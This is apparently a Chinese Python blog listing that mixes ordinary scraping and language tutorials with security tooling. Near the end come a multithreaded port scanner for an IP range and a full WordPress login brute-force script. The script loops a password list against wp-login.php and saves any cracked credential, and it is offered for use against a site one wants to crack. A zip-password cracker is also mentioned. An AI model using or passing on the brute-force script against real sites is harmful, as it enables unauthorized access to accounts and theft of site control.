            self.__download(url)



        '''

        url="http://photo.xitek.com/style/0/p/10"

        self.__download(url)

        '''

        #url="http://photo.xitek.com/style/0/p/0"

        #html=self.__getContent(url)

        #url="http://photo.xitek.com/"

        #html=self.__getContentNoZip(url)

        #print html

        #'''

def main():

    sub_folder = os.path.join(os.getcwd(), "content")

    if not os.path.exists(sub_folder):

        os.mkdir(sub_folder)

    os.chdir(sub_folder)

    obj=Xitek()

    obj.getPhoto()





if __name__=="__main__":

    main()

下载后在content文件夹下会自动抓取所有图片。（色影无忌的服务器没有做任何的屏蔽处理，所以脚本不能跑那么快，可以适当调用sleep函数，不要让服务器压力那么大）

已经下载好的图片：

github: https://github.com/Rockyzsu/fetchXitek (欢迎前来star)

python获取列表中的最大值

李魔佛发表了文章 • 0 个评论 • 5461 次浏览 • 2016-06-29 16:35 • 来自相关话题

其实python提供了内置的max函数，直接调用即可。

list=[1,2,3,5,4,6,434,2323,333,99999]
print "max of list is ",
print max(list)
输出 99999 查看全部

其实python提供了内置的max函数，直接调用即可。

    list=[1,2,3,5,4,6,434,2323,333,99999]

    print "max of list is ",

    print max(list)

输出 99999

python使用lxml加载 html---xpath

李魔佛发表了文章 • 0 个评论 • 3168 次浏览 • 2016-06-23 22:09 • 来自相关话题

首先确定安装了lxml。
然后按照以下代码去使用

#-*-coding=utf-8-*-
__author__ = 'rocchen'
from lxml import html
from lxml import etree
import urllib2

def lxml_test():
url="http://www.caixunzz.com"
req=urllib2.Request(url=url)
resp=urllib2.urlopen(req)
#print resp.read()

tree=etree.HTML(resp.read())
href=tree.xpath('//a[@class="label"]/@href')
#print href.tag
for i in href:
#print html.tostring(i)
#print type(i)
print i

print type(href)

lxml_test()

使用urllib2读取了网页内容，然后导入到lxml，为的就是使用xpath这个方便的函数。比单纯使用beautifulsoup要方便的多。（个人认为）查看全部

首先确定安装了lxml。
然后按照以下代码去使用

#-*-coding=utf-8-*-

__author__ = 'rocchen'

from lxml import html

from lxml import etree

import urllib2



def lxml_test():

    url="http://www.caixunzz.com"

    req=urllib2.Request(url=url)

    resp=urllib2.urlopen(req)

    #print resp.read()



    tree=etree.HTML(resp.read())

    href=tree.xpath('//a[@class="label"]/@href')

    #print href.tag

    for i in href:

        #print html.tostring(i)

        #print type(i)

        print i



    print type(href)



lxml_test()

使用urllib2读取了网页内容，然后导入到lxml，为的就是使用xpath这个方便的函数。比单纯使用beautifulsoup要方便的多。（个人认为）

scrapy 爬虫执行之前如何运行自定义的函数来初始化一些数据？

低调的哥哥回复了问题 • 2 人关注 • 1 个回复 • 10465 次浏览 • 2016-06-20 18:25 • 来自相关话题

python中字典赋值常见错误

李魔佛发表了文章 • 0 个评论 • 4112 次浏览 • 2016-06-19 11:39 • 来自相关话题

初学Python，在学到字典时，出现了一个疑问，见下两个算例：
算例一：>>> x = { }
>>> y = x
>>> x = { 'a' : 'b' }
>>> y
>>> { }
算例二：>>> x = { }
>>> y = x
>>> x['a'] = 'b'
>>> y
>>> { 'a' : 'b' }

疑问：为什么算例一中，给x赋值后，y没变（还是空字典），而算例二中，对x进行添加项的操作后，y就会同步变化。

解答：

y = x 那么x,y 是对同一个对象的引用。
算例一
中x = { 'a' : 'b' } x引用了一个新的字典对象
所以出现你说的情况。
算例二：修改y,x 引用的同一字典，所以出现你说的情况。

可以加id(x), id(y) ,如果id() 函数的返回值相同，表示是对同一个对象的引用。

查看全部

初学Python，在学到字典时，出现了一个疑问，见下两个算例：
算例一：

>>> x = { }

>>> y = x

>>> x = { 'a' : 'b' }

>>> y

>>> { }

算例二：

>>> x = { }

>>> y = x

>>> x['a'] = 'b'

>>> y

>>> { 'a' : 'b' }

疑问：为什么算例一中，给x赋值后，y没变（还是空字典），而算例二中，对x进行添加项的操作后，y就会同步变化。

解答：

y = x 那么x,y 是对同一个对象的引用。
算例一
中x = { 'a' : 'b' } x引用了一个新的字典对象
所以出现你说的情况。
算例二：修改y,x 引用的同一字典，所以出现你说的情况。

可以加id(x), id(y) ,如果id() 函数的返回值相同，表示是对同一个对象的引用。

ubuntu12.04 安装 scrapy 爬虫模块一系列问题与解决办法

李魔佛发起了问题 • 1 人关注 • 0 个回复 • 6042 次浏览 • 2016-06-16 16:18 • 来自相关话题

subprocess popen 使用PIPE 阻塞进程，导致程序无法继续运行

李魔佛发表了文章 • 0 个评论 • 9744 次浏览 • 2016-06-12 18:31 • 来自相关话题

subprocess用于在python内部创建一个子进程，比如调用shell脚本等。

举例：p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)
p.wait()
// hang here
print "finished"

在python的官方文档中对这个进行了解释：http://docs.python.org/2/library/subprocess.html

原因是stdout产生的内容太多，超过了系统的buffer

解决方法是使用communicate()方法。p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)
stdout, stderr = p.communicate()
p.wait()
print "Finsih" 查看全部

subprocess用于在python内部创建一个子进程，比如调用shell脚本等。

举例：

p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)

p.wait()

// hang here

print "finished"

在python的官方文档中对这个进行了解释：http://docs.python.org/2/library/subprocess.html

原因是stdout产生的内容太多，超过了系统的buffer

解决方法是使用communicate()方法。

p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)

stdout, stderr = p.communicate()

p.wait()

print "Finsih"

抓取知乎日报中的大误系类文章，生成电子书推送到kindle

python爬虫 • 李魔佛发表了文章 • 0 个评论 • 10039 次浏览 • 2016-06-12 08:52 • 来自相关话题

无意中看了知乎日报的大误系列的一篇文章，之后就停不下来了，大误是虚构故事，知乎上神人虚构故事的功力要高于网络上的很多写手啊！！看的欲罢不能，不过还是那句，手机屏幕太小，连续看几个小时很疲劳，而且每次都要联网去看。

所以写了下面的python脚本，一劳永逸。脚本抓取大误从开始到现在的所有文章，并推送到你自己的kindle账号。

# -*- coding=utf-8 -*-
__author__ = 'rocky @ www.30daydo.com'
import urllib2, re, os, codecs,sys,datetime
from bs4 import BeautifulSoup
# example https://zhhrb.sinaapp.com/index.php?date=20160610
from mail_template import MailAtt
reload(sys)
sys.setdefaultencoding('utf-8')

def save2file(filename, content):
filename = filename + ".txt"
f = codecs.open(filename, 'a', encoding='utf-8')
f.write(content)
f.close()

def getPost(date_time, filter_p):
url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')
result = re.findall(p, content)
count = -1
row = -1
for i in result:
#print i
return_content = re.findall(filter_p, i)

if return_content:
row = count
break
#print return_content[0]
count = count + 1
#print row
if row == -1:
return 0
link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')
link_result = re.findall(link_p, content)[row + 1]
print link_result
result_req = urllib2.Request(link_result, headers=header)
result_resp = urllib2.urlopen(result_req)
#result_content= result_resp.read()
#print result_content

bs = BeautifulSoup(result_resp, "html.parser")
title = bs.title.string.strip()
#print title
filename = re.sub('[\/:*?"<>|]', '-', title)
print filename
print date_time
save2file(filename, title)
save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" %date_time)

detail_content = bs.find_all('div', class_='content')

for i in detail_content:
#print i
save2file(filename,"\n\n-------------------------answer -------------------------\n\n")
for j in i.strings:

save2file(filename, j)

smtp_server = 'smtp.126.com'
from_mail = sys.argv[1]
password = sys.argv[2]
to_mail = 'xxxxx@kindle.cn'
send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
send_kindle.send_txt(filename)

def main():
sub_folder = os.path.join(os.getcwd(), "content")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)

date_time = '20160611'
filter_p = re.compile('大误.*')
ori_day=datetime.date(datetime.date.today().year,01,01)
t=datetime.date(datetime.date.today().year,datetime.date.today().month,datetime.date.today().day)
delta=(t-ori_day).days
print delta
for i in range(delta):
day=datetime.date(datetime.date.today().year,01,01)+datetime.timedelta(i)
getPost(day.strftime("%Y%m%d"),filter_p)
#getPost(date_time, filter_p)

if __name__ == "__main__":
main()

github： https://github.com/Rockyzsu/zhihu_daily__kindle

上面的代码可以稍作修改，就可以抓取瞎扯或者深夜食堂的系列文章。

附福利：
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。（截止2016/6/12日）查看全部

无意中看了知乎日报的大误系列的一篇文章，之后就停不下来了，大误是虚构故事，知乎上神人虚构故事的功力要高于网络上的很多写手啊！！看的欲罢不能，不过还是那句，手机屏幕太小，连续看几个小时很疲劳，而且每次都要联网去看。

所以写了下面的python脚本，一劳永逸。脚本抓取大误从开始到现在的所有文章，并推送到你自己的kindle账号。

# -*- coding=utf-8 -*-

__author__ = 'rocky @ www.30daydo.com'

import urllib2, re, os, codecs,sys,datetime

from bs4 import BeautifulSoup

# example https://zhhrb.sinaapp.com/index.php?date=20160610

from mail_template import MailAtt

reload(sys)

sys.setdefaultencoding('utf-8')



def save2file(filename, content):

    filename = filename + ".txt"

    f = codecs.open(filename, 'a', encoding='utf-8')

    f.write(content)

    f.close()





def getPost(date_time, filter_p):

    url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time

    user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

    header = {"User-Agent": user_agent}

    req = urllib2.Request(url, headers=header)

    resp = urllib2.urlopen(req)

    content = resp.read()

    p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')

    result = re.findall(p, content)

    count = -1

    row = -1

    for i in result:

        #print i

        return_content = re.findall(filter_p, i)



        if return_content:

            row = count

            break

            #print return_content[0]

        count = count + 1

    #print row

    if row == -1:

        return 0

    link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')

    link_result = re.findall(link_p, content)[row + 1]

    print link_result

    result_req = urllib2.Request(link_result, headers=header)

    result_resp = urllib2.urlopen(result_req)

    #result_content= result_resp.read()

    #print result_content



    bs = BeautifulSoup(result_resp, "html.parser")

    title = bs.title.string.strip()

    #print title

    filename = re.sub('[\/:*?"<>|]', '-', title)

    print filename

    print date_time

    save2file(filename, title)

    save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" %date_time)



    detail_content = bs.find_all('div', class_='content')



    for i in detail_content:

        #print i

        save2file(filename,"\n\n-------------------------answer  -------------------------\n\n")

        for j in i.strings:



            save2file(filename, j)



    smtp_server = 'smtp.126.com'

    from_mail = sys.argv[1]

    password = sys.argv[2]

    to_mail = 'xxxxx@kindle.cn'

    send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)

    send_kindle.send_txt(filename)





def main():

    sub_folder = os.path.join(os.getcwd(), "content")

    if not os.path.exists(sub_folder):

        os.mkdir(sub_folder)

    os.chdir(sub_folder)





    date_time = '20160611'

    filter_p = re.compile('大误.*')

    ori_day=datetime.date(datetime.date.today().year,01,01)

    t=datetime.date(datetime.date.today().year,datetime.date.today().month,datetime.date.today().day)

    delta=(t-ori_day).days

    print delta

    for i in range(delta):

        day=datetime.date(datetime.date.today().year,01,01)+datetime.timedelta(i)

        getPost(day.strftime("%Y%m%d"),filter_p)

    #getPost(date_time, filter_p)



if __name__ == "__main__":

    main()

github： https://github.com/Rockyzsu/zhihu_daily__kindle

上面的代码可以稍作修改，就可以抓取瞎扯或者深夜食堂的系列文章。

附福利：
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。（截止2016/6/12日）

mac os x安装pip？

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 5303 次浏览 • 2016-06-10 17:19 • 来自相关话题

python 爆解zip压缩文件密码

李魔佛发表了文章 • 0 个评论 • 9783 次浏览 • 2016-06-09 21:43 • 来自相关话题

出于对百度网盘的不信任，加上前阵子百度会把一些侵犯版权的文件清理掉或者一些百度认为的尺度过大的文件进行替换，留下一个4秒的教育视频。为何不提前告诉用户？擅自把用户的资料删除，以后用户哪敢随意把资料上传上去呢?

抱怨归抱怨，由于现在金山快盘，新浪尾盘都关闭了，速度稍微快点的就只有百度网盘了。所以我会把文件事先压缩好，加个密码然后上传。

可是有时候下载下来却忘记了解压密码，实在蛋疼。所以需要自己逐一验证密码。所以就写了这个小脚本。很简单，没啥技术含量。

代码就用图片吧，大家可以上机自己敲敲代码也好。 ctrl+v 代码其实会养成一种惰性。

github: https://github.com/Rockyzsu/zip_crash
查看全部

出于对百度网盘的不信任，加上前阵子百度会把一些侵犯版权的文件清理掉或者一些百度认为的尺度过大的文件进行替换，留下一个4秒的教育视频。为何不提前告诉用户？擅自把用户的资料删除，以后用户哪敢随意把资料上传上去呢?

抱怨归抱怨，由于现在金山快盘，新浪尾盘都关闭了，速度稍微快点的就只有百度网盘了。所以我会把文件事先压缩好，加个密码然后上传。

可是有时候下载下来却忘记了解压密码，实在蛋疼。所以需要自己逐一验证密码。所以就写了这个小脚本。很简单，没啥技术含量。

代码就用图片吧，大家可以上机自己敲敲代码也好。 ctrl+v 代码其实会养成一种惰性。

github: https://github.com/Rockyzsu/zip_crash

批量删除某个目录下所有子目录的指定后缀的文件

李魔佛发表了文章 • 0 个评论 • 4561 次浏览 • 2016-06-07 17:51 • 来自相关话题

平时硬盘中下载了大量的image文件，用做刷机。下载的文件是tgz格式，刷机前需要用 tar zxvf xxx.tgz 解压。
日积月累，硬盘空间告急，所以写了下面的脚本用来删除指定的解压文件，但是源解压文件不能够删除，因为后续可能会要继续用这个tgz文件的时候（需要再解压然后刷机）。如果手动去操作，需要进入每一个文件夹，然后选中tgz，然后反选，然后删除。很费劲。

import os

def isContain(des_str,ori_str):
for i in des_str:
if ori_str == i:
return True
return False

path=os.getcwd()
print path
des_str=['img','cfg','bct','bin','sh','dtb','txt','mk','pem','mk','pk8','xml','lib','pl','blob','dat']
for fpath,dirs,fname in os.walk(path):
#print fname

if fname:
for i in fname:
#print i
name=i.split('.')
if len(name)>=2:
#print name[1]
if isContain(des_str,name[1]):
filepath=os.path.join(fpath,i)
print "delete file %s" %filepath
os.remove(filepath)
github： https://github.com/Rockyzsu/RmFile
查看全部

平时硬盘中下载了大量的image文件，用做刷机。下载的文件是tgz格式，刷机前需要用 tar zxvf xxx.tgz 解压。
日积月累，硬盘空间告急，所以写了下面的脚本用来删除指定的解压文件，但是源解压文件不能够删除，因为后续可能会要继续用这个tgz文件的时候（需要再解压然后刷机）。如果手动去操作，需要进入每一个文件夹，然后选中tgz，然后反选，然后删除。很费劲。

import os



def isContain(des_str,ori_str):

	for i in des_str:

		if ori_str == i:

			return True

	return False





path=os.getcwd()

print path

des_str=['img','cfg','bct','bin','sh','dtb','txt','mk','pem','mk','pk8','xml','lib','pl','blob','dat']

for fpath,dirs,fname in os.walk(path):

	#print fname

	

	if fname:

		for i in fname:

			#print i

			name=i.split('.')

			if len(name)>=2:

				#print name[1]

				if isContain(des_str,name[1]):

					filepath=os.path.join(fpath,i)

					print "delete file %s" %filepath

					os.remove(filepath)

github： https://github.com/Rockyzsu/RmFile

python目录递归？

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 6955 次浏览 • 2016-06-07 17:14 • 来自相关话题

git 使用笔记或者日常使用中易错的地方？

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 6160 次浏览 • 2016-06-09 19:02 • 来自相关话题

python雪球爬虫抓取雪球大V的所有文章推送到kindle

python爬虫 • 李魔佛发表了文章 • 3 个评论 • 22158 次浏览 • 2016-05-29 00:06 • 来自相关话题

30天内完成。开始日期：2016年5月28日

因为雪球上喷子很多，不少大V都不堪忍受，被喷的删帖离开。比如易碎品，小小辛巴。
所以利用python可以有效便捷的抓取想要的大V发言内容，并保存到本地。也方便自己检索，考证（有些伪大V喜欢频繁删帖，比如今天预测明天大盘大涨，明天暴跌后就把昨天的预测给删掉，给后来者造成的错觉改大V每次都能精准预测）。

下面以抓取狂龙的帖子为例（狂龙最近老是掀人家庄家的老底，哈）

https://xueqiu.com/4742988362

2017年2月20日更新：
爬取雪球上我的收藏的文章，并生成电子书。
（PS：收藏夹中一些文章已经被作者删掉了 - -|，这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸）

# -*-coding=utf-8-*-
#抓取雪球的收藏文章
__author__ = 'Rocky'
import requests,cookielib,re,json,time
from toolkit import Toolkit
from lxml import etree
url='https://xueqiu.com/snowman/login'
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")
try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'xueqiu.com',
'Referer': 'https://xueqiu.com/',
'Origin':'https://xueqiu.com',
'User-Agent': agent}
account=Toolkit.getUserData('data.cfg')
print account['snowball_user']
print account['snowball_password']

data={'username':account['snowball_user'],'password':account['snowball_password']}
s=session.post(url,data=data,headers=headers)
print s.status_code
#print s.text
session.cookies.save()
fav_temp='https://xueqiu.com/favs?page=1'
collection=session.get(fav_temp,headers=headers)
fav_content= collection.text
p=re.compile('"maxPage":(\d+)')
maxPage=p.findall(fav_content)[0]
print maxPage
print type(maxPage)
maxPage=int(maxPage)
print type(maxPage)
for i in range(1,maxPage+1):
fav='https://xueqiu.com/favs?page=%d' %i
collection=session.get(fav,headers=headers)
fav_content= collection.text
#print fav_content
p=re.compile('var favs = {(.*?)};',re.S|re.M)
result=p.findall(fav_content)[0].strip()

new_result='{'+result+'}'
#print type(new_result)
#print new_result
data=json.loads(new_result)
use_data= data['list']
host='https://xueqiu.com'
for i in use_data:
url=host+ i['target']
print url
txt_content=session.get(url,headers=headers).text
#print txt_content.text

tree=etree.HTML(txt_content)
title=tree.xpath('//title/text()')[0]

filename = re.sub('[\/:*?"<>|]', '-', title)
print filename

content=tree.xpath('//div[@class="detail"]')
for i in content:
Toolkit.save2filecn(filename, i.xpath('string(.)'))
#print content
#Toolkit.save2file(filename,)
time.sleep(10)

用法：
1. snowball.py -- 抓取雪球上我的收藏的文章
使用：创建一个data.cfg的文件，里面格式如下：
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行python snowball.py ，会自动登录雪球，然后在当前目录生产txt文件。

github代码：https://github.com/Rockyzsu/xueqiu 查看全部

30天内完成。开始日期：2016年5月28日

因为雪球上喷子很多，不少大V都不堪忍受，被喷的删帖离开。比如易碎品，小小辛巴。
所以利用python可以有效便捷的抓取想要的大V发言内容，并保存到本地。也方便自己检索，考证（有些伪大V喜欢频繁删帖，比如今天预测明天大盘大涨，明天暴跌后就把昨天的预测给删掉，给后来者造成的错觉改大V每次都能精准预测）。

下面以抓取狂龙的帖子为例（狂龙最近老是掀人家庄家的老底，哈）

https://xueqiu.com/4742988362

2017年2月20日更新：
爬取雪球上我的收藏的文章，并生成电子书。
（PS：收藏夹中一些文章已经被作者删掉了 - -|，这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸）

# -*-coding=utf-8-*-

#抓取雪球的收藏文章

__author__ = 'Rocky'

import requests,cookielib,re,json,time

from toolkit import Toolkit

from lxml import etree

url='https://xueqiu.com/snowman/login'

session = requests.session()



session.cookies = cookielib.LWPCookieJar(filename="cookies")

try:

    session.cookies.load(ignore_discard=True)

except:

    print "Cookie can't load"



agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'

headers = {'Host': 'xueqiu.com',

           'Referer': 'https://xueqiu.com/',

           'Origin':'https://xueqiu.com',

           'User-Agent': agent}

account=Toolkit.getUserData('data.cfg')

print account['snowball_user']

print account['snowball_password']



data={'username':account['snowball_user'],'password':account['snowball_password']}

s=session.post(url,data=data,headers=headers)

print s.status_code

#print s.text

session.cookies.save()

fav_temp='https://xueqiu.com/favs?page=1'

collection=session.get(fav_temp,headers=headers)

fav_content= collection.text

p=re.compile('"maxPage":(\d+)')

maxPage=p.findall(fav_content)[0]

print maxPage

print type(maxPage)

maxPage=int(maxPage)

print type(maxPage)

for i in range(1,maxPage+1):

    fav='https://xueqiu.com/favs?page=%d' %i

    collection=session.get(fav,headers=headers)

    fav_content= collection.text

    #print fav_content

    p=re.compile('var favs = {(.*?)};',re.S|re.M)

    result=p.findall(fav_content)[0].strip()



    new_result='{'+result+'}'

    #print type(new_result)

    #print new_result

    data=json.loads(new_result)

    use_data= data['list']

    host='https://xueqiu.com'

    for i in use_data:

        url=host+ i['target']

        print url

        txt_content=session.get(url,headers=headers).text

        #print txt_content.text



        tree=etree.HTML(txt_content)

        title=tree.xpath('//title/text()')[0]



        filename = re.sub('[\/:*?"<>|]', '-', title)

        print filename



        content=tree.xpath('//div[@class="detail"]')

        for i in content:

            Toolkit.save2filecn(filename, i.xpath('string(.)'))

        #print content

        #Toolkit.save2file(filename,)

        time.sleep(10)

用法：
1. snowball.py -- 抓取雪球上我的收藏的文章
使用：创建一个data.cfg的文件，里面格式如下：
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行python snowball.py ，会自动登录雪球，然后在当前目录生产txt文件。

github代码：https://github.com/Rockyzsu/xueqiu

如何快速找到某个模块的帮助或者参数适用 python ？

贡献

低调的哥哥回复了问题 • 2 人关注 • 1 个回复 • 5808 次浏览 • 2016-05-23 23:46 • 来自相关话题

python 多线程扫描开放端口

低调的哥哥发表了文章 • 0 个评论 • 11480 次浏览 • 2016-05-15 21:15 • 来自相关话题

为什么说python是黑客的语言？因为很多扫描+破解的任务都可以用python很快的实现，简洁明了。且有大量的库来支持。import socket,sys
import time
from thread_test import MyThread

socket.setdefaulttimeout(1)
#设置每个线程socket的timeou时间，超过1秒没有反应就认为端口不开放
thread_num=4
#线程数目
ip_end=256
ip_start=0
scope=ip_end/thread_num

def scan(ip_head,ip_low, port):
try:
# Alert !!! below statement should be inside scan function. Else each it is one s
ip=ip_head+str(ip_low)
print ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
#通过这一句判断是否连通
s.close()
print "ip %s port %d open\n" %(ip,port)
return True
except:
return False

def scan_range(ip_head,ip_range,port):
start,end=ip_range
for i in range(start,end):
scan(ip_head,i,port)

if len(sys.argv)<3:
print "input ip and port"
exit()

ip_head=sys.argv[1]
port=int(sys.argv[2])

ip_range=
for i in range(thread_num):
x_range=[i*scope,(i+1)*scope-1]
ip_range.append(x_range)

threads=
for i in range(thread_num):
t=MyThread(scan_range,(ip_head,ip_range,port))
threads.append(t)
for i in range(thread_num):
threads.start()
for i in range(thread_num):
threads.join()
#设置进程阻塞，防止主线程退出了，其他的多线程还在运行

print "*****end*****"多线程的类函数实现：有一些测试函数在上面没注释或者删除掉，为了让一些初学者更加容易看懂。import thread,threading,time,datetime
from time import sleep,ctime
def loop1():
print "start %s " %ctime()
print "start in loop1"
sleep(3)
print "end %s " %ctime()

def loop2():
print "sart %s " %ctime()
print "start in loop2"
sleep(6)
print "end %s " %ctime()

class MyThread(threading.Thread):
def __init__(self,fun,arg,name=""):
threading.Thread.__init__(self)
self.fun=fun
self.arg=arg
self.name=name
#self.result

def run(self):
self.result=apply(self.fun,self.arg)

def getResult(self):
return self.result

def fib(n):
if n<2:
return 1
else:
return fib(n-1)+fib(n-2)

def sum(n):
if n<2:
return 1
else:
return n+sum(n-1)

def fab(n):
if n<2:
return 1
else:
return n*fab(n-1)

def single_thread():
print fib(12)
print sum(12)
print fab(12)

def multi_thread():
print "in multithread"
fun_list=[fib,sum,fab]
n=len(fun_list)
threads=
count=12
for i in range(n):
t=MyThread(fun_list,(count,),fun_list.__name__)
threads.append(t)
for i in range(n):
threads.start()

for i in range(n):
threads.join()
result= threads.getResult()
print result
def main():
'''
print "start at main"
thread.start_new_thread(loop1,())
thread.start_new_thread(loop2,())
sleep(10)
print "end at main"
'''
start=ctime()
#print "Used %f" %(end-start).seconds
print start
single_thread()
end=ctime()
print end
multi_thread()
#print "used %s" %(end-start).seconds
if __name__=="__main__":
main()

最终运行的格式就是 python scan_host.py 192.168.1. 22
上面的命令就是扫描192.168.1 ip段开启了22端口服务的机器，也就是ssh服务。

github：https://github.com/Rockyzsu/scan_host

查看全部

为什么说python是黑客的语言？因为很多扫描+破解的任务都可以用python很快的实现，简洁明了。且有大量的库来支持。

import socket,sys

import time

from thread_test import MyThread



socket.setdefaulttimeout(1)

#设置每个线程socket的timeou时间，超过1秒没有反应就认为端口不开放

thread_num=4

#线程数目 

ip_end=256

ip_start=0

scope=ip_end/thread_num



def scan(ip_head,ip_low, port):

    try:

        # Alert !!! below statement should be inside scan function. Else each it is one s

        ip=ip_head+str(ip_low)

	print ip

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	s.connect((ip, port))

	#通过这一句判断 是否连通

        s.close()

	print "ip %s port %d open\n" %(ip,port)

        return True

    except:

        return False





def scan_range(ip_head,ip_range,port):

	start,end=ip_range

	for i in range(start,end):

		scan(ip_head,i,port)



if len(sys.argv)<3:

	print "input ip and port"

	exit()



ip_head=sys.argv[1]

port=int(sys.argv[2])





ip_range=

for i in range(thread_num):

	x_range=[i*scope,(i+1)*scope-1]

	ip_range.append(x_range)



threads=

for i in range(thread_num):

	t=MyThread(scan_range,(ip_head,ip_range,port))

	threads.append(t)

for i in range(thread_num):

	threads.start()

for i in range(thread_num):

	threads.join()

	#设置进程阻塞，防止主线程退出了，其他的多线程还在运行



print "*****end*****"

多线程的类函数实现：有一些测试函数在上面没注释或者删除掉，为了让一些初学者更加容易看懂。

import thread,threading,time,datetime

from time import sleep,ctime

def loop1():

	print "start %s " %ctime()

	print "start in loop1"

	sleep(3)

	print "end %s " %ctime()



def loop2():

	print "sart %s " %ctime()

	print "start in loop2"

	sleep(6)

	print "end %s " %ctime()





class MyThread(threading.Thread):

	def __init__(self,fun,arg,name=""):

		threading.Thread.__init__(self)

		self.fun=fun

		self.arg=arg

		self.name=name

		#self.result



	def run(self):

		self.result=apply(self.fun,self.arg)

	

	def getResult(self):

		return self.result



def fib(n):

	if n<2:

		return 1

	else:

		return fib(n-1)+fib(n-2)





def sum(n):

	if n<2:

		return 1

	else:

		return n+sum(n-1)	



def fab(n):

	if n<2:

		return 1

	else:

		return n*fab(n-1)



def single_thread():		

	print fib(12)		

	print sum(12)

	print fab(12)





def multi_thread():

	print "in multithread"

	fun_list=[fib,sum,fab]

	n=len(fun_list)

	threads=

	count=12

	for i in range(n):

		t=MyThread(fun_list,(count,),fun_list.__name__)

		threads.append(t)

	for i in range(n):

		threads.start()



	for i in range(n):

		threads.join()

		result= threads.getResult()

		print result

def main():

	'''

	print "start at main"

	thread.start_new_thread(loop1,())

	thread.start_new_thread(loop2,())

	sleep(10)

	print "end at main"

	'''

	start=ctime()

	#print "Used %f" %(end-start).seconds

	print start	

	single_thread()

	end=ctime()

	print end

	multi_thread()

	#print "used %s" %(end-start).seconds 

if __name__=="__main__":

	main()

最终运行的格式就是 python scan_host.py 192.168.1. 22
上面的命令就是扫描192.168.1 ip段开启了22端口服务的机器，也就是ssh服务。

github：https://github.com/Rockyzsu/scan_host

python 暴力破解wordpress博客后台登陆密码

python爬虫 • 低调的哥哥发表了文章 • 0 个评论 • 25553 次浏览 • 2016-05-13 17:49 • 来自相关话题

自己曾经折腾过一阵子wordpress的博客，说实话，wordpress在博客系统里面算是功能很强大的了，没有之一。
不过用wordpress的朋友可能都是贪图方便，很多设置都使用的默认，我之前使用的某一个wordpress版本中，它的后台没有任何干扰的验证码（因为它默认给用户关闭了，需要自己去后台开启，一般用户是使用缺省设置）。

所以只要使用python+urllib库，就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。

所以以后用wordpress的博客用户，平时还是把图片验证码的功能开启，怎样安全性会高很多。（其实python也带有一个破解一个验证码的库 - 。-！）# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys

class wordpress():
def __init__(self, host, username):
#初始化定义 header ，避免被服务器屏蔽
self.username = username
self.http="http://"+host
self.url = self.http + "/wp-login.php"
self.redirect = self.http + "/wp-admin/"
self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
self.referer=self.http+"/wp-login.php"
self.cook="wordpress_test_cookie=WP+Cookie+check"
self.host=host
self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
self.cookie = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))

def crash(self, filename):
try:
pwd = open(filename, 'r')
#读取密码文件，密码文件中密码越多破解的概率越大
while 1 :
i=pwd.readline()
if not i :
break

data = urllib.urlencode(
{"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
#构造好数据包之后提交给wordpress网站后台
Resp = urllib2.urlopen(Req)
result = Resp.read()
# print result
login = re.search(r'login_error', result)
#判断返回来的字符串，如果有login error说明失败了。
if login:
pass
else:
print "Crashed! password is %s %s" % (self.username,i.strip())
g=open("wordpress.txt",'w+')
g.write("Crashed! password is %s %s" % (self.username,i.strip()))
pwd.close()
g.close()
#如果匹配到密码，则这次任务完成，退出程序
exit()
break

pwd.close()

except Exception, e:
print "error"
print e
print "Error in reading password"

if __name__ == "__main__":
print "begin at " + time.ctime()
host=sys.argv[1]
#url = "http://"+host
#给程序提供参数，为你要破解的网址
user = sys.argv[2]
dictfile=sys.argv[3]
#提供你事先准备好的密码文件
obj = wordpress(host, user)
#obj.check(dictfile)
obj.crash(dictfile)
#obj.crash_v()
print "end at " + time.ctime()

github源码：https://github.com/Rockyzsu/crashWordpressPassword
查看全部

